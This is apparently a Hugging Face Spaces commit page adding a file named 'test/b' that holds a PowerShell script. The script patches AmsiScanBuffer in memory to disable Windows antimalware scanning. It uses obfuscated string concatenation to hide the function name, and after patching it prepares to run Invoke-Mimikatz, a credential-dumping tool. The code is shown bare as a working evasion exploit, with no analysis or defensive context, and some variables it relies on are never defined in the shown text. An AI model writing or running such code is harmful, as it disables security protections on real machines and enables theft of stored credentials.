Spaces:
Runtime error
Runtime error
Create b
Browse files
test/b
ADDED
|
@@ -0,0 +1,64 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
|
| 2 |
+
if ($count -ne 0) {
|
| 3 |
+
Write-Host "Count is not zero. Continuing with the second part of the script..."
|
| 4 |
+
$Win32 = @"
|
| 5 |
+
using System;
|
| 6 |
+
using System.Runtime.InteropServices;
|
| 7 |
+
|
| 8 |
+
public class Win32 {
|
| 9 |
+
[DllImport("kernel32")]
|
| 10 |
+
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
|
| 11 |
+
|
| 12 |
+
[DllImport("kernel32")]
|
| 13 |
+
public static extern IntPtr LoadLibrary(string name);
|
| 14 |
+
|
| 15 |
+
[DllImport("kernel32")]
|
| 16 |
+
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
| 17 |
+
|
| 18 |
+
[DllImport("kernel32")]
|
| 19 |
+
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out int lpNumberOfBytesWritten);
|
| 20 |
+
|
| 21 |
+
[DllImport("kernel32")]
|
| 22 |
+
public static extern IntPtr GetCurrentProcess();
|
| 23 |
+
}
|
| 24 |
+
"@
|
| 25 |
+
|
| 26 |
+
Add-Type $Win32
|
| 27 |
+
|
| 28 |
+
$LoadLibrary = [Win32]::LoadLibrary($a + "i.dll")
|
| 29 |
+
if ($LoadLibrary -eq [IntPtr]::Zero) {
|
| 30 |
+
Write-Host "[-] Failed to load amsi.dll."
|
| 31 |
+
exit
|
| 32 |
+
}
|
| 33 |
+
$Address = [Win32]::GetProcAddress($LoadLibrary, ($a + $b + $c + $d))
|
| 34 |
+
if ($Address -eq [IntPtr]::Zero) {
|
| 35 |
+
Write-Host "[-] Failed to get address of AmsiScanBuffer."
|
| 36 |
+
exit
|
| 37 |
+
}
|
| 38 |
+
$oldProtect = 0
|
| 39 |
+
if (-not [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$oldProtect)) {
|
| 40 |
+
Write-Host "[-] Failed to change memory protection."
|
| 41 |
+
exit
|
| 42 |
+
}
|
| 43 |
+
Write-Host "[+] Old protection: $oldProtect"
|
| 44 |
+
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
|
| 45 |
+
$bytesWritten = 0
|
| 46 |
+
$hProcess = [Win32]::GetCurrentProcess()
|
| 47 |
+
|
| 48 |
+
if (-not [Win32]::WriteProcessMemory($hProcess, $Address, $Patch, $Patch.Length, [ref]$bytesWritten)) {
|
| 49 |
+
Write-Host "[-] Failed to write memory."
|
| 50 |
+
exit
|
| 51 |
+
}
|
| 52 |
+
Write-Host "[+] Bytes written: $bytesWritten"
|
| 53 |
+
|
| 54 |
+
if ($bytesWritten -eq $Patch.Length) {
|
| 55 |
+
Write-Host "[+] Patch applied successfully!"
|
| 56 |
+
|
| 57 |
+
$String = "Invoke-Mimikatz"
|
| 58 |
+
Write-Host "[*] Trying to execute: $String"
|
| 59 |
+
} else {
|
| 60 |
+
Write-Host "[-] Failed to apply patch."
|
| 61 |
+
}
|
| 62 |
+
} else {
|
| 63 |
+
Write-Host "Count is zero. Exiting..."
|
| 64 |
+
}
|